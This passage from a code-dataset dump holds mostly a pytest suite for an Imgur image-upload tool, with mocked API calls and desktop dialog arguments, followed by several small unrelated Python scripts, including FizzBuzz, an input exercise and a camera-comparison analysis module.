type(self.ImgurFactory.get_instance(prefer_gui) == MacImgur)\n\n def test_get_instance_gnome(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.setenv('DESKTOP_SESSION', 'gnome')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == ZenityImgur\n\n def test_get_instance_pantheon(self, monkeypatch):\n monkeypatch.delenv('KDE_FULL_SESSION', raising=False)\n monkeypatch.setenv('DESKTOP_SESSION', 'pantheon')\n monkeypatch.setattr(imgurup.sys, 'platform', 'linux2')\n prefer_gui = True\n assert type(self.ImgurFactory.get_instance(prefer_gui)) == ZenityImgur\n\n\nclass TestCLIImgur:\n\n def setup(self):\n self.imgur = CLIImgur()\n self.imgur.connect()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._token_config = (\n '[Token]\\n'\n 'access_token = 0000000000000000000000000000000000000000\\n'\n 'refresh_token = 1111111111111111111111111111111111111111\\n'\n )\n self._token_response = (\n '{\"access_token\":\"2222222222222222222222222222222222222222\",'\n '\"expires_in\":3600,'\n '\"token_type\":\"bearer\",'\n '\"scope\":null,'\n '\"refresh_token\":\"3333333333333333333333333333333333333333\",'\n '\"account_username\":\"carlcarl\"}'\n )\n self._token_json_response = {\n u'access_token': u'2222222222222222222222222222222222222222',\n u'expires_in': 3600,\n u'token_type': u'bearer',\n u'account_username': u'carlcarl',\n u'scope': None,\n u'refresh_token': u'3333333333333333333333333333333333333333'\n }\n self._album_response = (\n '{\"data\":[{\"id\":\"XXXXX\",'\n '\"title\":\"temp\",'\n '\"description\":null,'\n '\"datetime\":1352238500,'\n '\"cover\":\"Oin6z\",'\n '\"cover_width\":1891,'\n '\"cover_height\":967,'\n '\"account_url\":\"carlcarl\",'\n '\"privacy\":\"hidden\",'\n '\"layout\":\"grid\",'\n '\"views\":2,'\n '\"link\":\"http:\\/\\/imgur.com\\/a\\/XXXXX\",'\n '\"favorite\":false,'\n '\"nsfw\":null,'\n '\"section\":null,'\n '\"deletehash\":\"000000000000000\",'\n '\"order\":0}],'\n '\"success\":true,'\n '\"status\":200}'\n )\n self._album_fail_response = (\n '{\"data\":{\"error\": \"fail\"},'\n '\"success\":false,'\n '\"status\":200}'\n )\n self._album_json_response = {\n u'status': 200,\n u'data': [\n {\n u'deletehash': u'000000000000000',\n u'layout': u'grid',\n u'description': None,\n u'title': u'temp',\n u'cover_height': 967,\n u'views': 2,\n u'privacy': u'hidden',\n u'cover': u'Oin6z',\n u'datetime': 1352238500,\n u'account_url': u'carlcarl',\n u'favorite': False,\n u'cover_width': 1891,\n u'link': u'http://imgur.com/a/XXXXX',\n u'section': None,\n u'nsfw': None,\n u'order': 0,\n u'id': u'XXXXX'\n }\n ],\n u'success': True\n }\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n @pytest.fixture(scope='function')\n def mock_HTTPSConnection(self, request):\n m = mock.patch('imgurup.httplib.HTTPSConnection')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_connect(self, mock_HTTPSConnection):\n _imgur = CLIImgur()\n _imgur.connect()\n mock_HTTPSConnection.assert_has_calls(\n [\n call('api.imgur.com')\n ]\n )\n\n def test_set_tokens_using_config(self, monkeypatch):\n\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n self.imgur.set_tokens_using_config()\n assert self.imgur._access_token == '0000000000000000000000000000000000000000'\n assert self.imgur._refresh_token == '1111111111111111111111111111111111111111'\n\n def test_is_success(self):\n response = {}\n response['success'] = True\n response['data'] = {}\n response['data']['error'] = 'error'\n assert self.imgur.is_success(response) is True\n response['success'] = False\n assert self.imgur.is_success(response) is False\n\n def test_write_tokens_to_config(self):\n from mock import mock_open\n self.imgur._access_token = '0000000000000000000000000000000000000000'\n self.imgur._refresh_token = '1111111111111111111111111111111111111111'\n with patch('imgurup.SafeConfigParser.read'):\n m = mock_open()\n with patch(get_builtin_name('open'), m, create=True):\n self.imgur.write_tokens_to_config()\n m.assert_called_once_with(self.imgur.CONFIG_PATH, 'w')\n handle = m()\n handle.write.assert_has_calls(\n [\n call('[Token]\\n'),\n call('access_token = 0000000000000000000000000000000000000000\\n'),\n call('refresh_token = 1111111111111111111111111111111111111111\\n'),\n ]\n )\n\n def test_get_error_dialog_args(self):\n assert self.imgur.get_error_dialog_args() is None\n\n def test_get_auth_msg_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n\n def test_get_enter_pin_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n\n @pytest.mark.httpretty\n def test_request_album_list_me_success(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/me/albums\",\n body=self._album_response,\n status=200\n )\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n json_response = self.imgur.request_album_list()\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_album_list_carlcarl_success(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/carlcarl/albums\",\n body=self._album_response,\n status=200\n )\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n json_response = self.imgur.request_album_list(account='carlcarl')\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_album_list_me_fail(self, monkeypatch):\n httpretty.register_uri(\n httpretty.GET,\n \"https://api.imgur.com/3/account/me/albums\",\n body=self._album_fail_response,\n status=200\n )\n m = mock.Mock(return_value=None)\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'request_new_tokens_and_update',\n m\n )\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'write_tokens_to_config',\n m\n )\n monkeypatch.setattr(\n imgurup.time,\n 'sleep',\n m\n )\n with pytest.raises(SystemExit):\n self.imgur.request_album_list()\n\n @pytest.mark.httpretty\n def test_request_new_token(self):\n httpretty.register_uri(\n httpretty.POST,\n \"https://api.imgur.com/oauth2/token\",\n body=self._token_response,\n status=200\n )\n json_response = self.imgur.request_new_tokens()\n assert json_response == self._token_json_response\n\n @pytest.mark.httpretty\n def test_request_new_tokens_and_update(self):\n httpretty.register_uri(\n httpretty.POST,\n \"https://api.imgur.com/oauth2/token\",\n body=self._token_response,\n status=200\n )\n # Fail case which without token values in config\n with patch(get_builtin_name('open'), return_value=io.StringIO('')):\n with pytest.raises(SystemExit):\n self.imgur.request_new_tokens_and_update()\n\n # Success case\n with patch(get_builtin_name('open'), return_value=io.StringIO(self._token_config)):\n self.imgur.request_new_tokens_and_update()\n assert self.imgur._access_token == '2222222222222222222222222222222222222222'\n assert self.imgur._refresh_token == '3333333333333333333333333333333333333333'\n\n self.imgur._refresh_token = '3333333333333333333333333333333333333333'\n with patch('imgurup.CLIImgur.request_new_tokens') as request_new_tokens:\n request_new_tokens.return_value = {\n 'success': False,\n 'data': {\n 'error': 'error'\n }\n }\n with pytest.raises(SystemExit):\n self.imgur.request_new_tokens_and_update()\n\n @pytest.fixture(scope='function')\n def mock_raw_input(self, request):\n m = mock.patch('imgurup.input')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_pin(self, mock_raw_input):\n pin = '000000'\n mock_raw_input.return_value = pin\n assert self.imgur.ask_pin(\n self._auth_msg,\n self._auth_url,\n self._enter_token_msg) == pin\n\n @pytest.fixture(scope='function')\n def mock_ask_pin(self, request):\n m = mock.patch('imgurup.CLIImgur.ask_pin')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n @pytest.mark.httpretty\n def test_auth(self, mock_ask_pin):\n mock_ask_pin.return_value = '000000'\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/oauth2/token',\n body=(\n '{\"success\":false,'\n '\"data\":{\"error\":\"error\"} }'\n ),\n status=200\n )\n with pytest.raises(SystemExit):\n self.imgur.auth()\n\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/oauth2/token',\n body=(\n '{\"success\":true,'\n '\"access_token\":\"1111111111111111111111111111111111111111\",'\n '\"refresh_token\":\"2222222222222222222222222222222222222222\"}'\n ),\n status=200\n )\n self.imgur.auth()\n assert self.imgur._access_token == '1111111111111111111111111111111111111111'\n assert self.imgur._refresh_token == '2222222222222222222222222222222222222222'\n\n def test_get_ask_image_path_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_ask_image_path_dialog_args()\n\n def test_ask_image_path(self, mock_raw_input):\n path = '/home/test/test.jpg'\n mock_raw_input.return_value = path\n assert self.imgur.ask_image_path() == path\n\n def test_get_ask_album_id_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_ask_album_id_dialog_args(\n self._albums,\n self._no_album_msg\n )\n\n def test_ask_album_id(self):\n with patch('imgurup.input', return_value=1):\n assert self.imgur.ask_album_id(self._albums) == '1'\n\n def test_get_show_link_dialog_args(self):\n with pytest.raises(NotImplementedError):\n self.imgur.get_show_link_dialog_args({})\n\n @pytest.fixture(scope='function')\n def mock_print(self, request):\n m = mock.patch(get_builtin_name('print'))\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_show_link(self, mock_print):\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_print.assert_has_calls(\n [\n call('Link: http://i.imgur.com/xxxxxxx.jpg'),\n call('Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx')\n ]\n )\n\n def test_encode_multipart_data(self):\n \"\"\"Just test if the function can work\"\"\"\n post_data = {\n 'title': 'test',\n }\n files = {\n 'image': os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n 'images',\n 'test.jpg'\n ),\n }\n try:\n self.imgur._encode_multipart_data(post_data, files)\n assert True\n except:\n assert False\n\n\n @pytest.mark.httpretty\n def test_request_upload_image_success(self):\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/3/image',\n body=self._album_response,\n status=200\n )\n json_response = self.imgur.request_upload_image(\n 'https://api.imgur.com/3/image',\n body='',\n headers={}\n )\n assert len(json_response) == 1\n\n @pytest.mark.httpretty\n def test_request_upload_image_fail(self, monkeypatch):\n httpretty.register_uri(\n httpretty.POST,\n 'https://api.imgur.com/3/image',\n body=self._album_fail_response,\n status=200\n )\n m = mock.Mock(return_value=None)\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'request_new_tokens_and_update',\n m\n )\n monkeypatch.setattr(\n imgurup.CLIImgur,\n 'write_tokens_to_config',\n m\n )\n monkeypatch.setattr(\n imgurup.time,\n 'sleep',\n m\n )\n with pytest.raises(SystemExit):\n self.imgur.request_upload_image(\n 'https://api.imgur.com/3/image',\n body='',\n headers={}\n )\n\n\nclass TestZenityImgur:\n\n def setup(self):\n from imgurup import ZenityImgur\n self.imgur = ZenityImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._auth_msg_dialog_args = [\n 'zenity',\n '--entry',\n (\n '--text=This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n'\n ),\n (\n '--entry-text=https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl'\n )\n ]\n self._enter_pin_dialog_args = [\n 'zenity',\n '--entry',\n '--text=Enter PIN code displayed in the browser: ',\n ]\n self._ask_album_id_dialog_args = [\n 'zenity',\n '--list',\n '--text=\"Choose the album\"',\n '--column=No.',\n '--column=Album name',\n '--column=Privacy',\n '1',\n 'hello',\n 'public',\n '2',\n 'hello2',\n 'private',\n '3',\n 'Do not move to any album',\n 'public'\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n @pytest.fixture(scope='function')\n def mock_subprocess(self, request):\n m = mock.patch('imgurup.subprocess')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_show_error_and_exit(self, mock_subprocess):\n mock_subprocess.Popen.return_value.returncode = 0\n with pytest.raises(SystemExit):\n self.imgur.show_error_and_exit(1)\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'zenity',\n '--error',\n '--text=Error',\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n assert result == self._auth_msg_dialog_args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n assert result == self._enter_pin_dialog_args\n\n\n @pytest.fixture(scope='function')\n def mock_get_auth_msg_dialog_args(self, request):\n m = mock.patch('imgurup.ZenityImgur.get_auth_msg_dialog_args')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_pin(\n self,\n mock_get_auth_msg_dialog_args,\n mock_subprocess\n ):\n def _test_ask_pin(args, stdout, stderr):\n from mock import MagicMock\n m = MagicMock()\n if args == self._auth_msg_dialog_args:\n m.communicate = lambda: ['']\n elif args == self._enter_pin_dialog_args:\n m.communicate = lambda: ['XXXXXX']\n return m\n\n mock_get_auth_msg_dialog_args.return_value = self._auth_msg_dialog_args\n mock_subprocess.Popen.side_effect = _test_ask_pin\n pin = self.imgur.ask_pin(\n self._auth_msg,\n self._auth_url,\n self._enter_token_msg\n )\n assert pin == 'XXXXXX'\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n self._auth_msg_dialog_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n ),\n call(\n self._enter_pin_dialog_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'zenity',\n '--file-selection',\n ]\n assert result == args\n\n def test_ask_image_path(self, mock_subprocess):\n # Fail case\n mock_subprocess.Popen.return_value.communicate = lambda: ['']\n with pytest.raises(SystemExit):\n self.imgur.ask_image_path()\n # Success case\n mock_subprocess.Popen.return_value.communicate = lambda: ['/tmp/test.jpg']\n image_path = self.imgur.ask_image_path()\n assert image_path == '/tmp/test.jpg'\n\n def test_get_ask_album_id_dialog_args(self):\n no_album_msg = self._no_album_msg\n result = self.imgur.get_ask_album_id_dialog_args(self._albums, no_album_msg)\n assert result == self._ask_album_id_dialog_args\n\n @pytest.fixture(scope='function')\n def mock_get_ask_album_id_dialog_args(self, request):\n m = mock.patch('imgurup.ZenityImgur.get_ask_album_id_dialog_args')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_album_id(\n self,\n mock_get_ask_album_id_dialog_args,\n mock_subprocess\n ):\n mock_get_ask_album_id_dialog_args.return_value = self._ask_album_id_dialog_args\n mock_subprocess.Popen.return_value.communicate = lambda: ['1']\n result = self.imgur.ask_album_id(self._albums)\n assert result == '1'\n mock_subprocess.Popen.return_value.communicate = lambda: ['']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n result = self.imgur.get_show_link_dialog_args(links)\n args = [\n 'zenity',\n '--info',\n (\n '--text=Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n ]\n assert result == args\n\n def test_show_link(self, mock_subprocess):\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n [\n 'zenity',\n '--info',\n (\n '--text=Link: http://i.imgur.com/xxxxxxx.jpg\\n'\n 'Delete link: http://imgur.com/delete/xxxxxxxxxxxxxxx'\n )\n ],\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n\nclass TestKDEImgur:\n def setup(self):\n from imgurup import KDEImgur\n self.imgur = KDEImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'kdialog',\n '--error',\n 'Error',\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n args = [\n 'kdialog',\n '--msgbox',\n (\n 'This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n'\n 'https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl'\n )\n ]\n assert result == args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n args = [\n 'kdialog',\n '--title',\n 'Input dialog',\n '--inputbox',\n 'Enter PIN code displayed in the browser: ',\n ]\n assert result == args\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'kdialog',\n '--getopenfilename',\n '.',\n ]\n assert result == args\n\n def test_get_ask_album_id_dialog_args(self):\n albums = []\n albums.append(\n {\n 'title': 'hello',\n 'privacy': 'public'\n }\n )\n albums.append(\n {\n 'title': 'hello2',\n 'privacy': 'private'\n }\n )\n no_album_msg = self._no_album_msg\n result = self.imgur.get_ask_album_id_dialog_args(albums, no_album_msg)\n args = [\n 'kdialog',\n '--menu',\n '\"Choose the album\"',\n '1',\n 'hello(public)',\n '2',\n 'hello2(private)',\n '3',\n 'Do not move to any album(public)',\n ]\n assert result == args\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n result = self.imgur.get_show_link_dialog_args(links)\n args = [\n 'kdialog',\n '--msgbox',\n (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n ]\n assert result == args\n\n\nclass TestMacImgur:\n\n def setup(self):\n from imgurup import MacImgur\n self.imgur = MacImgur()\n self._enter_token_msg = self.imgur._enter_token_msg\n self._auth_url = self.imgur._auth_url\n self._auth_msg = self.imgur._auth_msg\n self._no_album_msg = self.imgur._no_album_msg\n self._albums = [\n {\n 'id': '1',\n 'title': 'hello',\n 'privacy': 'public'\n },\n {\n 'id': '2',\n 'title': 'hello2',\n 'privacy': 'private'\n }\n ]\n self._image_link = 'http://i.imgur.com/xxxxxxx.jpg'\n self._delete_hash = 'xxxxxxxxxxxxxxx'\n\n def test_get_error_dialog_args(self):\n result = self.imgur.get_error_dialog_args()\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display alert '\n '\"Error\" as warning'\n ),\n ]\n assert result == args\n\n def test_get_auth_msg_dialog_args(self):\n result = self.imgur.get_auth_msg_dialog_args(self._auth_msg, self._auth_url)\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"SystemUIServer\" to display dialog '\n '\"This is the first time you use this program, '\n 'you have to visit this URL in your browser '\n 'and copy the PIN code: \\n\" '\n 'default answer '\n '\"https://api.imgur.com/oauth2/authorize?'\n 'client_id=55080e3fd8d0644&response_type=pin&state=carlcarl\" '\n 'with icon 1'\n ),\n ]\n assert result == args\n\n def test_get_enter_pin_dialog_args(self):\n result = self.imgur.get_enter_pin_dialog_args(self._enter_token_msg)\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"SystemUIServer\" to display dialog '\n '\"Enter PIN code displayed in the browser: \" '\n 'default answer \"\" with icon 1'\n ),\n '-e',\n 'text returned of result',\n ]\n assert result == args\n\n def test_get_ask_image_path_dialog_args(self):\n result = self.imgur.get_ask_image_path_dialog_args()\n args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to POSIX path of '\n '(choose file with prompt \"Choose Image:\")'\n ),\n ]\n assert result == args\n\n def test_get_ask_album_id_dialog_args(self):\n albums = []\n no_album_msg = self._no_album_msg\n assert self.imgur.get_ask_album_id_dialog_args(albums, no_album_msg) is None\n\n @pytest.fixture(scope='function')\n def mock_subprocess(self, request):\n m = mock.patch('imgurup.subprocess')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_ask_album_id(self, mock_subprocess):\n mock_subprocess.Popen.return_value.communicate = lambda: ['1 Public(public)']\n assert self.imgur.ask_album_id(self._albums) == '1'\n mock_subprocess.Popen.return_value.communicate = lambda: ['1Public(public)']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n mock_subprocess.Popen.return_value.communicate = lambda: [' Public(public)']\n with pytest.raises(SystemExit):\n self.imgur.ask_album_id(self._albums)\n\n def test_get_show_link_dialog_args(self):\n links = (\n 'http://imgur.com/aaaaa\\n'\n 'Delete link: http://imgur.com/delete/bbbbb'\n )\n assert self.imgur.get_show_link_dialog_args(links) is None\n\n def test_show_link(self, mock_subprocess):\n show_link_args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display dialog \"Image Link\" '\n 'default answer \"{link}\" '\n 'buttons {{\"Show delete link\", \"OK\"}} '\n 'default button 2'.format(link=self._image_link)\n ),\n ]\n delete_link = 'http://imgur.com/delete/{delete}'.format(delete=self._delete_hash)\n delete_link_args = [\n 'osascript',\n '-e',\n (\n 'tell app \"Finder\" to display dialog \"Delete link\" '\n 'default answer \"{link}\"'.format(link=delete_link)\n ),\n ]\n\n def _test_show_link(args, stdout, stderr):\n from mock import MagicMock\n m = MagicMock()\n if args == show_link_args:\n m.communicate = lambda: [\n (\n 'button returned:Show delete link, '\n 'text returned:http://i.imgur.com/xxxxxxx.jpg'\n )\n ]\n elif args == delete_link_args:\n m.communicate = lambda: ['']\n return m\n\n mock_subprocess.Popen.side_effect = _test_show_link\n self.imgur.show_link(self._image_link, self._delete_hash)\n mock_subprocess.Popen.assert_has_calls(\n [\n call(\n show_link_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n ),\n call(\n delete_link_args,\n stdout=mock_subprocess.PIPE,\n stderr=mock_subprocess.PIPE\n )\n ]\n )\n\n @pytest.fixture(scope='function')\n def mock_copy2(self, request):\n m = mock.patch('imgurup.shutil.copy2')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n @pytest.fixture(scope='function')\n def mock_argparse(self, request):\n m = mock.patch('imgurup.argparse')\n ret = m.start()\n request.addfinalizer(m.stop)\n return ret\n\n def test_main(self, mock_argparse, mock_copy2):\n from argparse import Namespace\n n = Namespace()\n n.s = True\n mock_argparse.ArgumentParser.return_value.parse_args = lambda: n\n from imgurup import main\n main()\n","repo_name":"carlcarl/imgurup","sub_path":"tests/test_imgurup.py","file_name":"test_imgurup.py","file_ext":"py","file_size_in_byte":32861,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"40463402637","text":"def leiaint(msg):\n while True:\n valor = input(msg)\n if valor.isnumeric():\n print(f'Você digitou o valor {valor}')\n return valor\n else:\n print(f'Digitou errado corno.')\n\n\n#Programa principal:\nn = leiaint('Digite um número inteiro:')\nprint(n)\n\n","repo_name":"MathBergamo/Python","sub_path":"CeV/Ex#104.py","file_name":"Ex#104.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40268512140","text":"fizz = 0\nbuzz = 0\n\nnumLow = input(\"Enter the start number\")\nnumHigh = input(\"Enter the end number\")\n\nfor x in range(numLow, numHigh + 1):\n\tfizz = 0 #reset fizzbuzz variables\n\tbuzz = 0\n\tif(x+1)%3 == 0:\n\t\tfizz = 1\t#setting fizzbuzz based on modulo of 3 or 5\n\tif(x+1)%5 == 0:\n\t\tbuzz = 1\n\t\n\tif(fizz and buzz):\n\t\tprint(\"FizzBuzz!\") #printing based off of fuzzbuzz variables\n\telif(fizz):\n\t\tprint(\"Fizz\")\n\telif(buzz):\n\t\tprint(\"Buzz\")\n\telse:\n\t\tprint(x+1)","repo_name":"IMDCGP105-1819/portfolio-Oshawatt123","sub_path":"Documents/ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1882416582","text":"\"\"\" camera comparison \"\"\"\n\nimport itertools\nfrom collections import defaultdict\n\nimport numpy as np\nfrom tqdm import tnrange\n\nfrom pelops.analysis.camerautil import (get_match_id, glue, make_good_bad,\n nameit_cam, nameit_car)\n\n\ndef eval_good_bad(first, second, clf, featuredataset, goodmatches, badmatches, attribute_name):\n \"\"\"\n label examples of good and bad comparisons\n\n take two chips, concantenate their feature vectors\n and create a balanced dataset of matches and differences\n\n first(Chip): image to evaluate\n second(Chip): image to evaluate\n clr(classifier): classifier used to evaluate chips\n fd(featureDataset): maps chips to features\n goodmatches(defaultdictionary(int)): counts of good matches\n badmatches(defaultdictionary(int)): counts of bad matches\n attribute_name(str): which attribute to pull names from\n \"\"\"\n\n namefunc = None\n if attribute_name == 'car':\n namefunc = nameit_car\n else:\n namefunc = nameit_cam\n\n bigvec1 = glue(featuredataset.get_feats_for_chip(first),\n featuredataset.get_feats_for_chip(second))\n\n bigvec1np = np.array(bigvec1)\n #bigvec1np.reshape(1, -1)\n\n bigvec2 = glue(featuredataset.get_feats_for_chip(second),\n featuredataset.get_feats_for_chip(first))\n\n bigvec2np = np.array(bigvec2)\n # bigvec2np.reshape(1, -1))\n\n decision = clf.predict(bigvec1np.reshape(1, -1))\n name = namefunc(first, second)\n\n tally_decision(decision, goodmatches, name, badmatches)\n\n decision = clf.predict(bigvec2np.reshape(1, -1))\n name = namefunc(second, first)\n\n tally_decision(decision, goodmatches, name, badmatches)\n\n\ndef tally_decision(decision, goodpic, name, badpic):\n \"\"\"\n count the number of matches for a name\n\n decision(int): whether the classifier said they matched\n goodpic(defaultdict(int)): list of good matches\n badpic(defaultdict(int)): list of bad matches\n name(str): concatenation of names of first and second pics\n \"\"\"\n if decision == 1:\n goodpic[name] += 1\n else:\n badpic[name] += 1\n\n\ndef mad_matrix(examples, clf, featuredataset, examplegenerator, attribute_name='car'):\n \"\"\"\n run examples experiments to see how cars are declaired\n the same or different by the clf classifier.abs\n\n examples(int): number of trials\n clf(classifier): classifier to make same/different distinciton\n fd(featureDataset) : allows joining of chip to features\n eg(experimentGenerator): makes expermients for testing\n \"\"\"\n\n ddg = defaultdict(int)\n ddb = defaultdict(int)\n\n for _ in tnrange(examples):\n cameras_test = examplegenerator.generate()\n match_id = get_match_id(cameras_test)\n goods, bads = make_good_bad(cameras_test, match_id)\n good0 = goods[0]\n good1 = goods[1]\n bad0 = bads[0]\n bad1 = bads[1]\n\n eval_good_bad(good0, good1, clf, featuredataset,\n ddg, ddb, attribute_name)\n eval_good_bad(bad0, bad1, clf, featuredataset,\n ddb, ddg, attribute_name)\n\n return(ddg, ddb)\n\n\ndef make_work(fd_train, lessons, outcomes, items, label):\n \"\"\"\n makes a listing of work from chips for classification\n\n fd_train(featureDataset): training features\n lessons(list): feature vectors\n outcomes(list): expected outcome for the comparison\n items(list(chips)): list of chips for comparison\n label(int): expected label for the comparison\n \"\"\"\n workitems = itertools.permutations(items, 2)\n for workitem in workitems:\n item = glue(fd_train.get_feats_for_chip(\n workitem[0]), fd_train.get_feats_for_chip(workitem[1]))\n\n lessons.append(item)\n outcomes.append(label)\n\n item = glue(fd_train.get_feats_for_chip(\n workitem[1]), fd_train.get_feats_for_chip(workitem[0]))\n\n lessons.append(item)\n outcomes.append(label)\n","repo_name":"Lab41/pelops","sub_path":"pelops/analysis/comparecameras.py","file_name":"comparecameras.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"35972654852","text":"import json\n\nf = open(\"programs_eval.json\", 'r')\nw = open(\"pluginProperty.txt\", 'a')\n\nall_properties = []\nproperties = []\n\nfor line in f.readlines():\n dics = json.loads(line)\n for i in range(len(dics)):\n curr = []\n if isinstance(dics[i], dict):\n if dics[i]['type'] == 'Property':\n if 'value' in dics[i].keys():\n if dics[i]['value'] not in curr:\n curr.append((dics[i]['value']))\n if dics[i]['value'] in all_properties and dics[i]['value'] not in properties:\n w.write(str(dics[i]['value']))\n w.write('\\n')\n properties.append(dics[i]['value'])\n # all_properties.append(dics[i]['value'])\n else:\n all_properties.append(dics[i]['value'])\n all_properties += curr\n\n# for property in properties:\n# w.write(property)\n# w.write('\\n')","repo_name":"Wayne-Bai/Graph","sub_path":"Data-Processing/extractProperty.py","file_name":"extractProperty.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8363049080","text":"import cv2\nimport numpy as np\n\ndef encode2Png(data, fileName):\n data=np.frombuffer(data, dtype=np.uint8)\n 